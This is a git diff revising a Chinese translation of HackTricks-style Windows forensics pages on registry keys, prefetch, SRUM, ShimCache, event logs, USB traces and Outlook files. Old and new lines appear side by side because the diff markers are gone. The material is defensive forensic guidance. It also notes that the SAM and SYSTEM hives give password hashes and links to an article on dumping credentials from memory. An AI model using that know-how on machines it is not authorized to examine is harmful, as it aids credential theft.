要检查这些文件,你可以使用[**LinkParser**](http://4discovery.com/our-tools/)。
@ -110,7 +112,7 @@ LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs
### Jumplists
这些是每个应用程序指示的最近文件。这是您可以在每个应用程序访问的**应用程序最近使用的文件列表**。它们可以是**自动创建或自定义**的。
这些是每个应用程序指示的最近文件。这是您可以在每个应用程序访问的**应用程序最近使用的文件列表**。它们可以是**自动创建或自定义**的。
自动创建的**jumplists**存储在`C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\`。Jumplists按照格式`{id}.autmaticDestinations-ms`命名初始ID是应用程序的ID。
@ -150,7 +152,7 @@ WPDNSE文件夹中的文件是原始文件的副本因此在PC重启后不会
检查文件`C:\Windows\inf\setupapi.dev.log`以获取USB连接产生的时间戳搜索`Section start`)。
![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png>)
![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png>)
### USB Detective
@ -158,15 +160,15 @@ WPDNSE文件夹中的文件是原始文件的副本因此在PC重启后不会
![](<../../../.gitbook/assets/image (483).png>)
### Plug and Play Cleanup
### 插放清理
Plug and Play Cleanup”计划任务负责**清除**旧版驱动程序。根据在线报告,它还会捡起**30天内未使用的驱动程序**尽管其描述指出“将保留每个驱动程序包的最新版本”。因此,**30天内未连接的可移动设备可能会除其驱动程序**。
插放清理”计划任务负责**清除**旧版驱动程序。根据在线报告,尽管其描述指出“将保留每个驱动程序包的最新版本”,但它似乎也会清除**30天内未使用的驱动程序**。因此,**30天内未连接的可移动设备可能会被移除其驱动程序**。
计划任务本身位于`C:\Windows\System32\Tasks\Microsoft\Windows\Plug and Play\Plug and Play Cleanup`,其内容如下所示:
![](https://2.bp.blogspot.com/-wqYubtuR\_W8/W19bV5S9XyI/AAAAAAAANhU/OHsBDEvjqmg9ayzdNwJ4y2DKZnhCdwSMgCLcBGAs/s1600/xml.png)
任务引用了“pnpclean.dll”它负责执行清理活动此外我们看到“UseUnifiedSchedulingEngine”字段设置为“TRUE”这指定使用通用任务调度引擎来管理任务。“MaintenanceSettings”中的“Period”和“Deadline”值“P1M”和“P2M”指示任务调度程序在常规自动维护期间每月执行一次任务如果连续2个月失败则在紧急自动维护期间开始尝试任务。**此部分自**[**这里**](https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html)**。**
任务引用了“pnpclean.dll”它负责执行清理活动我们看到“UseUnifiedSchedulingEngine”字段设置为“TRUE”这指定使用通用任务调度引擎来管理任务。“MaintenanceSettings”中的“Period”和“Deadline”值“P1M”和“P2M”指示任务调度程序在常规自动维护期间每月执行一次任务如果连续2个月失败则在紧急自动维护期间开始尝试任务。**此部分内容复制自**[**这里**](https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html)**。**
## 电子邮件
@ -194,9 +196,9 @@ WPDNSE文件夹中的文件是原始文件的副本因此在PC重启后不会
* `Mapi-Client-Submit-Time`:发送电子邮件时系统的时间
* `Mapi-Conversation-Index`:线程的子消息数量和线程每条消息的时间戳
* `Mapi-Entry-ID`:消息标识符。
* `Mappi-Message-Flags`和`Pr_last_Verb-Executed`关于MAPI客户端的信息消息已读未读已回复已转发外出
* `Mappi-Message-Flags`和`Pr_last_Verb-Executed`关于MAPI客户端的信息消息已读未读已回复已转发不在办公室
在Microsoft Outlook客户端所有发送/接收的消息、联系人数据和日历数据都存储在PST文件中
在Microsoft Outlook客户端,所有发送/接收的消息、联系人数据和日历数据都存储在PST文件中
* `%USERPROFILE%\Local Settings\Application Data\Microsoft\Outlook`WinXP
* `%USERPROFILE%\AppData\Local\Microsoft\Outlook`
@ -209,7 +211,7 @@ WPDNSE文件夹中的文件是原始文件的副本因此在PC重启后不会
### Outlook OST
当Microsoft Outlook配置**使用** **IMAP**或使用**Exchange**服务器时,它会生成一个**OST**文件存储与PST文件几乎相同的信息。它保持文件与服务器同步**最近12个月****最大文件大小为50GB**并保存在与PST**文件相同的文件夹中**。您可以使用[**Kernel OST viewer**](https://www.nucleustechnologies.com/ost-viewer.html)检查此文件。
当Microsoft Outlook配置**使用** **IMAP**或使用**Exchange**服务器时,它会生成一个**OST**文件存储与PST文件几乎相同的信息。它保持文件与服务器同步**最近12个月****最大文件大小为50GB**,并保存在**与PST**文件相同的文件夹中。您可以使用[**Kernel OST viewer**](https://www.nucleustechnologies.com/ost-viewer.html)检查此文件。
### 恢复附件
@ -224,7 +226,7 @@ WPDNSE文件夹中的文件是原始文件的副本因此在PC重启后不会
## 缩略图
当用户访问文件夹并使用缩略图进行组织时,会创建一个`thumbs.db`文件。即使删除了这个db**存储文件夹中图像的缩略图**。在WinXP和Win 8-8.1中此文件会自动创建。在Win7/Win10中如果通过UNC路径\IP\folder...)访问,则会自动创建。
当用户访问文件夹并使用缩略图进行组织时,会创建一个`thumbs.db`文件。即使被删除,这个数据库**存储文件夹中图像的缩略图**。在WinXP和Win 8-8.1中此文件会自动创建。在Win7/Win10中如果通过UNC路径\IP\folder...)访问,则会自动创建。
可以使用工具[**Thumbsviewer**](https://thumbsviewer.github.io)读取此文件。
@ -235,13 +237,13 @@ WPDNSE文件夹中的文件是原始文件的副本因此在PC重启后不会
* Thumbcache\_32.db -> 小
* Thumbcache\_96.db -> 中
* Thumbcache\_256.db -> 大
* Thumbcache\_1024.db -> 非常
* Thumbcache\_1024.db ->
您可以使用[**ThumbCache Viewer**](https://thumbcacheviewer.github.io)读取此文件。
## Windows注册表
Windows注册表包含大量关于**系统和用户行为**的**信息**。
Windows注册表包含大量关于**系统和用户行为**的**信息**。
包含注册表的文件位于:
@ -260,7 +262,7 @@ Windows注册表包含了大量关于**系统和用户行为**的**信息**。
一些工具对分析注册表文件很有用:
* **注册表编辑器**它安装在Windows中。它是一个GUI可以通过当前会话浏览Windows注册表。
* **注册表编辑器**它安装在Windows中。它是一个GUI用于浏览当前会话的Windows注册表。
* [**Registry Explorer**](https://ericzimmerman.github.io/#!index.md)它允许您加载注册表文件并通过GUI浏览它们。它还包含突出显示有趣信息的键的书签。
* [**RegRipper**](https://github.com/keydet89/RegRipper3.0)同样它有一个GUI允许浏览加载的注册表并且还包含突出显示加载的注册表中有趣信息的插件。
* [**Windows Registry Recovery**](https://www.mitec.cz/wrr.html)另一个GUI应用程序能够从加载的注册表中提取重要信息。
@ -277,7 +279,7 @@ Windows注册表包含了大量关于**系统和用户行为**的**信息**。
文件/配置单元**SAM**包含系统的**用户、组和用户密码**哈希。
在`SAM\Domains\Account\Users`中您可以获得用户名、RID、上次登录、上次失败登录、登录计数器、密码策略以及账户创建时间。要获取**哈希**,您还**需要**文件/配置单元**SYSTEM**。
在`SAM\Domains\Account\Users`中您可以获得用户名、RID、最后登录、最后失败登录、登录计数器、密码策略以及账户创建时间。要获取**哈希**,您还**需要**文件/配置单元**SYSTEM**。
### Windows注册表中的有趣条目
@ -297,42 +299,44 @@ Windows注册表包含了大量关于**系统和用户行为**的**信息**。
### Windows最近应用
在注册表`NTUSER.DAT`的路径`Software\Microsoft\Current Version\Search\RecentApps`中,您可以找到带有有关**执行的应用程序**、**最后执行时间**和**启动次数**的信息的子键
在注册表`NTUSER.DAT`的路径`Software\Microsoft\Current Version\Search\RecentApps`中,您可以找到子键,其中包含有关**执行的应用程序**、**最后执行时间**和**启动次数**的信息。
### BAMBackground Activity Moderator
### BAM后台活动调节器
您可以使用注册表编辑器打开`SYSTEM`文件,在路径`SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}`中找到有关**每个用户执行的应用程序**的信息(注意路径中的`{SID}`)以及**执行时间**时间在注册表的Data值中
您可以使用注册表编辑器打开`SYSTEM`文件,在路径`SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}`中找到有关**每个用户执行的应用程序**的信息(注意路径中的`{SID}`以及**执行时间**时间在注册表的Data值中
### Windows Prefetch
### Windows预取
预取是一种技术,允许计算机静默**获取用户**可能在不久的将来访问的内容所需的资源,以便可以更快地访问资源。
预取是一种技术,允许计算机静默**获取用户**可能在不久的将来访问的内容所需的资源,以便可以更快地访问资源。
Windows预取包括创建**执行程序的缓存**,以便能够更快地加载它们。这些缓存作为`.pf`文件创建在路径:`C:\Windows\Prefetch`。在XP/VISTA/WIN7中有128个文件的限制在Win8/Win10中有1024个文件的限制。
Windows预取包括创建**执行程序的缓存**,以便能够更快地加载它们。这些缓存作为`.pf`文件创建在路径:`C:\Windows\Prefetch`。在XP/VISTA/WIN7中有128个文件的限制在Win8/Win10中有1024个文件的限制。
文件名创建为`{program_name}-{hash}.pf`哈希基于可执行文件的路径和参数。在W10中这些文件被压缩。请注意文件的单独存在表明**程序在某个时候被执行**
文件名创建为`{program_name}-{hash}.pf`哈希基于可执行文件的路径和参数。在W10中这些文件被压缩。请注意文件的单独存在表明**程序在某个时候被执行**
文件`C:\Windows\Prefetch\Layout.ini`包含**预取文件的文件夹名称**。这个文件包含**执行次数**、**执行日期**和**程序** **打开的文件**的**信息**
文件`C:\Windows\Prefetch\Layout.ini`包含**预取文件的文件夹名称**。文件包含**执行次数**、**执行日期**和**程序打开的文件**的**信息**。
要检查这些文件,您可以使用工具[**PEcmd.exe**](https://github.com/EricZimmerman/PECmd)
```bash
.\PECmd.exe -d C:\Users\student\Desktop\Prefetch --html "C:\Users\student\Desktop\out_folder"
```
![](<../../../.gitbook/assets/image (487).png>)
### Superprefetch
**Superprefetch** 的目标与 prefetch 相同,即通过预测接下来将要加载的内容来**更快地加载程序**。然而,它并不替代 prefetch 服务。
该服务`C:\Windows\Prefetch\Ag*.db` 生成数据库文件。
**Superprefetch** 的目标与 prefetch 相同,即通过预测下一步将要加载的内容来**更快地加载程序**。然而,它并不替代 prefetch 服务。\
该服务`C:\Windows\Prefetch\Ag*.db` 生成数据库文件。
在这些数据库中,你可以找到**程序**的**名称**、**执行**的**次数**、**打开**的**文件**、**访问**的**卷**、**完整**的**路径**、**时间范围**和**时间戳**。
你可以使用工具 [**CrowdResponse**](https://www.crowdstrike.com/resources/community-tools/crowdresponse/) 访问这些信息。
你可以使用工具 [**CrowdResponse**](https://www.crowdstrike.com/resources/community-tools/crowdresponse/) 访问这些信息。
### SRUM
**系统资源使用监视器**SRUM**监控**由进程**消耗**的**资源**。它出现在 W8 中,并将数据存储在位于 `C:\Windows\System32\sru\SRUDB.dat` 的 ESE 数据库中。
**系统资源使用监视器**SRUM**监控**由**进程** **消耗**的**资源**。它在 W8 中出现,并将数据存储在位于 `C:\Windows\System32\sru\SRUDB.dat` 的 ESE 数据库中。
它提供以下信息:
* AppID 和路径
* 应用程序 ID 和路径
* 执行进程的用户
* 发送的字节数
* 接收的字节数
@ -348,7 +352,7 @@ Windows预取包括创建**执行程序的缓存**,以便能够更快地加载
```
### AppCompatCache (ShimCache)
**Shimcache**,也称为 **AppCompatCache**,是 **Microsoft** 创建的 **应用程序兼容性数据库**的一个组成部分,操作系统使用它来识别应用程序兼容性问题。
**Shimcache**,也称为**AppCompatCache**,是**Microsoft**创建的**应用程序兼容性数据库**的组成部分,操作系统使用它来识别应用程序兼容性问题。
缓存根据操作系统存储各种文件元数据,例如:
@ -360,23 +364,23 @@ Windows预取包括创建**执行程序的缓存**,以便能够更快地加载
此信息可以在注册表中找到:
* `SYSTEM\CurrentControlSet\Control\SessionManager\Appcompatibility\AppCompatCache`
* `SYSTEM\CurrentControlSet\Control\SessionManager\Appcompatibility\AppcompatCache`
* XP (96 条目)
* `SYSTEM\CurrentControlSet\Control\SessionManager\AppcompatCache\AppCompatCache`
* Server 2003 (512 条目)
* 2008/2012/2016 Win7/Win8/Win10 (1024 条目)
您可以使用工具 [**AppCompatCacheParser**](https://github.com/EricZimmerman/AppCompatCacheParser) 来解析这些信息。
您可以使用工具 [**AppCompatCacheParser**](https://github.com/EricZimmerman/AppCompatCacheParser) 来解析信息。
![](<../../../.gitbook/assets/image (488).png>)
### Amcache
**Amcache.hve** 文件是一个注册表文件,存储已执行应用程序的信息。它位于 `C:\Windows\AppCompat\Programas\Amcache.hve`
**Amcache.hve** 文件是一个注册表文件,存储已执行应用程序的信息。它位于 `C:\Windows\AppCompat\Programas\Amcache.hve`
**Amcache.hve** 记录了最近运行的进程,并列出了被执行的文件的路径,然后可以用来找到执行的程序。它还记录了程序的 SHA1。
**Amcache.hve** 记录了最近运行的进程,并列出了被执行的文件的路径,然后可以用来找到执行的程序。它还记录了程序的 SHA1。
您可以使用工具 [**Amcacheparser**](https://github.com/EricZimmerman/AmcacheParser) 来解析这些信息。
您可以使用工具 [**Amcacheparser**](https://github.com/EricZimmerman/AmcacheParser) 来解析信息。
```bash
AmcacheParser.exe -f C:\Users\student\Desktop\Amcache.hve --csv C:\Users\student\Desktop\srum
```
@ -400,7 +404,7 @@ AmcacheParser.exe -f C:\Users\student\Desktop\Amcache.hve --csv C:\Users\student
### **Windows 商店**
已安装的应用程序可以在 `\ProgramData\Microsoft\Windows\AppRepository\` 中找到\
这个库有一个 **日志**,其中包含系统内数据库 **`StateRepository-Machine.srd`** 中的 **每个已安装应用程序**
这个存储库有一个 **日志**,其中包含系统内数据库 **`StateRepository-Machine.srd`** 中的 **每个已安装应用程序**
在此数据库的应用程序表中,可以找到 "Application ID"、"PackageNumber" 和 "Display Name" 列。这些列包含了预安装和已安装应用程序的信息,如果某些应用程序已卸载也可以找到,因为已安装应用程序的 ID 应该是连续的。
@ -419,7 +423,7 @@ Windows 事件中出现的信息包括:
日志位于 Windows Vista 之前的 `C:\Windows\System32\config` 和 Windows Vista 之后的 `C:\Windows\System32\winevt\Logs`。在 Windows Vista 之前,事件日志是二进制格式,之后,它们是 **XML 格式** 并使用 **.evtx** 扩展名。
事件文件的位置可以在 SYSTEM 注册表中 **`HKLM\SYSTEM\CurrentControlSet\services\EventLog\{Application|System|Security}`** 中找到。
事件文件的位置可以在 SYSTEM 注册表中找到 **`HKLM\SYSTEM\CurrentControlSet\services\EventLog\{Application|System|Security}`**
它们可以通过 Windows 事件查看器(**`eventvwr.msc`**)或其他工具如 [**Event Log Explorer**](https://eventlogxp.com) **或** [**Evtx Explorer/EvtxECmd**](https://ericzimmerman.github.io/#!index.md)** 查看。**
@ -429,10 +433,10 @@ Windows 事件中出现的信息包括:
事件文件的 **最大大小** 是可配置的,当达到最大大小时,它将开始覆盖旧事件。
注册为以下事件
注册为的事件包括
* 登录/注销
* 用户的操作
* 用户的行为
* 访问文件、文件夹和共享资产
* 修改安全配置
@ -457,10 +461,10 @@ Windows 事件中出现的信息包括:
* **9 (新凭证)**:使用 `RunAs` 命令或用户使用不同的凭证访问网络服务时生成
* **10 (远程交互式)**:通过终端服务或 RDP 进行认证
* **11 (缓存交互式)**:使用最后缓存的凭证访问,因为无法联系到域控制器
* **12 (缓存远程交互式)**:使用缓存凭证远程登录10 和 11 的结合)。
* **13 (缓存解锁)**:使用缓存凭证解锁锁定的机器。
* **12 (缓存远程交互式)**远程使用缓存凭证登录10 和 11 的结合)。
* **13 (缓存解锁)**:使用缓存凭证解锁锁定的机器。
在这篇文章中,您可以找到如何模仿所有这些类型的登录,以及在哪些登录中您将能够从内存中转储凭证:[https://www.alteredsecurity.com/post/fantastic-windows-logon-types-and-where-to-find-credentials-in-them](https://www.alteredsecurity.com/post/fantastic-windows-logon-types-and-where-to-find-credentials-in-them)
在这篇文章中,您可以找到如何模仿所有这些类型的登录,在哪些登录中您将能够从内存中转储凭证:[https://www.alteredsecurity.com/post/fantastic-windows-logon-types-and-where-to-find-credentials-in-them](https://www.alteredsecurity.com/post/fantastic-windows-logon-types-and-where-to-find-credentials-in-them)
事件的状态和子状态信息可以指示事件原因的更多细节。例如,看看以下 Event ID 4625 的状态和子状态代码:
@ -468,7 +472,7 @@ Windows 事件中出现的信息包括:
### 恢复 Windows 事件
强烈建议通过**拔掉电源**关闭可疑的 PC以最大化恢复 Windows 事件的可能性。如果它们被删除了,一个可能有用的工具是 [**Bulk\_extractor**](../partitions-file-systems-carving/file-data-carving-recovery-tools.md#bulk-extractor),指定 **evtx** 扩展名。
强烈建议通过**拔掉电源**关闭可疑的 PC以最大化恢复 Windows 事件的可能性。如果它们被删除了,一个可能有用的工具是 [**Bulk\_extractor**](../partitions-file-systems-carving/file-data-carving-recovery-tools.md#bulk-extractor),指定 **evtx** 扩展名。
## 使用 Windows 事件识别常见攻击
@ -476,7 +480,7 @@ Windows 事件中出现的信息包括:
### 暴力破解攻击
暴力破解攻击很容易识别,因为会出现**多个 EventIDs 4625**。如果攻击**成功**,在 EventIDs 4625 之后,**会出现 EventID 4624**。
暴力破解攻击很容易识别,因为会出现**多个 EventIDs 4625**。如果攻击**成功**,在 EventIDs 4625 之后,**会出现一个 EventID 4624**。
### 时间更改
@ -501,13 +505,15 @@ EventID 112 来自 DeviceSetupManager 包含每个 USB 设备插入的时间戳
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>从零开始学习 AWS 黑客攻击直到成为专家,通过</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS 红队专家)</strong></a><strong></strong></summary>
* 如果您在**网络安全公司**工作,想在 HackTricks 中看到您的**公司广告**,或者想要访问**最新版本的 PEASS 或下载 HackTricks 的 PDF**?查看 [**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现 [**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家 [**NFTs**](https://opensea.io/collection/the-peass-family) 系列
支持 HackTricks 的其他方式:
* 如果您想在 **HackTricks** 中看到您的**公司广告**或**下载 HackTricks 的 PDF**,请查看 [**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取 [**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* **加入** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或在 **Twitter** 上**关注**我 [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向 [**hacktricks repo**](https://github.com/carlospolop/hacktricks) 和 [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) 提交 PR 来**分享您的黑客技巧**。
* 发现 [**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们独家的 [**NFTs**](https://opensea.io/collection/the-peass-family) 收藏
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
</details>
```

119
forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md
View file

@ -1,16 +1,18 @@
# 有趣的Windows注册表键
# 有趣的Windows注册表键
## 有趣的Windows注册表键
## 有趣的Windows注册表键
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 推特 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 YouTube 🎥</strong></a></summary>
<summary><strong>从零开始学习AWS黑客攻击直到成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong></strong></summary>
* 你在一家**网络安全公司**工作吗你想在HackTricks中看到你的**公司广告**吗?或者你想获得**PEASS的最新版本或下载PDF格式的HackTricks**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram群组**](https://t.me/peass) 或 **关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。**
支持HackTricks的其他方式
* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
</details>
@ -18,7 +20,7 @@
### 版本
* **`Software\Microsoft\Windows NT\CurrentVersion`**: Windows版本、Service Pack、安装时间和注册所有者
* **`Software\Microsoft\Windows NT\CurrentVersion`**: Windows版本,服务包,安装时间和注册所有者
### 主机名
@ -30,29 +32,29 @@
### 最后访问时间
* **`System\ControlSet001\Control\Filesystem`**: 最后访问时间(默认情况下使用`NtfsDisableLastAccessUpdate=1`禁用,如果为`0`,则启用)。
* **`System\ControlSet001\Control\Filesystem`**: 最后访问时间(默认情况下是禁用的,`NtfsDisableLastAccessUpdate=1`,如果是`0`,则启用)。
* 要启用它:`fsutil behavior set disablelastaccess 0`
### 关机时间
* `System\ControlSet001\Control\Windows`: 关机时间
* `System\ControlSet001\Control\Watchdog\Display`: 关机计数(仅适用于XP
* `System\ControlSet001\Control\Watchdog\Display`: 关机次数(仅限XP
### 网络信息
* **`System\ControlSet001\Services\Tcpip\Parameters\Interfaces{GUID_INTERFACE}`**: 网络接口
* **`Software\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Unmanaged` & `Software\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Managed` & `Software\Microsoft\Windows NT\CurrentVersion\NetworkList\Nla\Cache`**: 第一次和最后一次进行网络连接以及通过VPN进行的连接
* **`Software\Microsoft\WZCSVC\Parameters\Interfaces{GUID}`适用于XP & `Software\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles`**: 网络类型0x47-无线0x06-有线0x17-3G和类别0-公共1-私人/家庭2-域/工作)以及最后连接
* **`Software\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Unmanaged` & `Software\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Managed` & `Software\Microsoft\Windows NT\CurrentVersion\NetworkList\Nla\Cache`**: 第一次和最后一次执行网络连接的时间以及通过VPN的连接
* **`Software\Microsoft\WZCSVC\Parameters\Interfaces{GUID}` (适用于XP) & `Software\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles`**: 网络类型0x47-无线0x06-有线0x17-3G和类别0-公共1-私人/家庭2-域/工作)以及最后连接
### 共享文件夹
* **`System\ControlSet001\Services\lanmanserver\Shares\`**: 共享文件夹及其配置。如果启用了**客户端缓存**CSCFLAGS则共享文件的副本将保存在客户端和服务器的`C:\Windows\CSC`中
* CSCFlag=0 -> 默认情况下,用户需要指示要缓存的文件
* CSCFlag=16 -> 自动缓存文档。"用户从共享文件夹打开的所有文件和程序都会自动脱机可用",未选中"为性能优化"
* CSCFlag=32 -> 类似于前面的选项,但选中了"为性能优化"。
* CSCFlag=48 -> 禁用缓存
* CSCFlag=2048: 此设置仅适用于Win 7和8并且是在禁用"简单文件共享"或使用"高级"共享选项之前的默认设置。它似乎也是"家庭组"的默认设置。
* CSCFlag=768 -> 此设置仅在共享打印设备上看到。
* CSCFlag=0 -> 默认情况下,用户需要指示他想要缓存的文件
* CSCFlag=16 -> 自动缓存文档。“所有用户从共享文件夹打开的文件和程序都会自动离线可用”,并且未勾选“优化性能”
* CSCFlag=32 -> 类似于前面的选项,但勾选了“优化性能”
* CSCFlag=48 -> 缓存被禁用。
* CSCFlag=2048: 这个设置只在Win 7 & 8上并且是直到您禁用“简单文件共享”或使用“高级”共享选项之前的默认设置。它似乎也是“家庭组”默认的设置
* CSCFlag=768 -> 这个设置只在共享打印设备上看到。
### 自启动程序
@ -64,34 +66,35 @@
### 资源管理器搜索
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\WordwheelQuery`: 用户使用资源管理器/助手搜索的内容。具有`MRU=0`的项目是最后一个。
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\WordwheelQuery`: 用户使用资源管理器/助手搜索的内容。带有`MRU=0`的项是最后一个。
### 输入路径
### 输入路径
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths`: 资源管理器中的路径类型(仅适用于W10
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths`: 在资源管理器中输入的路径(仅限W10
### 最近文档
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs`: 用户打开的最近文档
* `NTUSER.DAT\Software\Microsoft\Office{Version}{Excel|Word}\FileMRU`: 最近的Office文档。版本
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs`: 用户最近打开的文档
* `NTUSER.DAT\Software\Microsoft\Office{Version}{Excel|Word}\FileMRU`:最近的Office文档。版本
* 14.0 Office 2010
* 12.0 Office 2007
* 11.0 Office 2003
* 10.0 Office X
* `NTUSER.DAT\Software\Microsoft\Office{Version}{Excel|Word} UserMRU\LiveID_###\FileMRU`: 最近的Office文档。版本
* 15.0 Office 2013
* 15.0 office 2013
* 16.0 Office 2016
### MRUs
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU`
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LasVisitedPidlMRU`
指示可执行文件执行的路径
表示从哪个路径执行了可执行文件
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\Op enSaveMRU` (XP)
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\Op enSavePidlMRU`
指示在打开的窗口中打开的文件
表示在打开的窗口内打开的文件
### 最后运行的命令
@ -102,16 +105,16 @@
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count`
GUID是应用程序的ID。保存的数据
GUID是应用程序的ID。保存的数据包括
* 最后运行时间
* 运行次数
* GUI应用程序名称包含绝对路径和更多信息
* 焦时间和焦名称
* GUI应用程序名称包含绝对路径和更多信息)
* 焦时间和焦名称
## Shellbags
当您打开一个目录时Windows会将有关如何可视化该目录的数据保存在注册表中。这些条目被称为Shellbags。
当您打开一个目录时Windows会在注册表中保存有关如何可视化目录的数据。这些条目被称为Shellbags。
资源管理器访问:
@ -123,12 +126,12 @@ GUID是应用程序的ID。保存的数据
* `NTUSER.DAT\Software\Microsoft\Windows\Shell\BagMRU`
* `NTUSER.DAT\Software\Microsoft\Windows\Shell\Bags`
要分析Shellbags您可以使用[**Shellbag Explorer**](https://ericzimmerman.github.io/#!index.md),您将能够找到文件夹的**MAC时间**以及与文件夹的**首次访问时间和最后访问时间**相关的shellbag的创建日期和修改日期。
要分析Shellbags您可以使用[**Shellbag Explorer**](https://ericzimmerman.github.io/#!index.md),您将能够找到**文件夹的MAC时间**以及shellbag的创建日期和修改日期,这些日期与**第一次和最后一次**访问文件夹有关
从以下图像中注意两件事:
从以下图注意两件事:
1. 我们知道插入在**E**中的**USB的文件夹名称**
2. 我们知道**shellbag创建和修改时间**以及文件夹创建和访问时间
1. 我们知道插入**E:** 的USB的**文件夹名称**
2. 我们知道**shellbag创建和修改时间**以及文件夹创建和访问时间
![](<../../../.gitbook/assets/image (475).png>)
@ -136,13 +139,13 @@ GUID是应用程序的ID。保存的数据
### 设备信息
注册表`HKLM\SYSTEM\ControlSet001\Enum\USBSTOR`监视连接到计算机的每个USB设备。\
在此注册表中可以找到:
注册表`HKLM\SYSTEM\ControlSet001\Enum\USBSTOR`监控连接到PC的每个USB设备。\
在此注册表中可以找到:
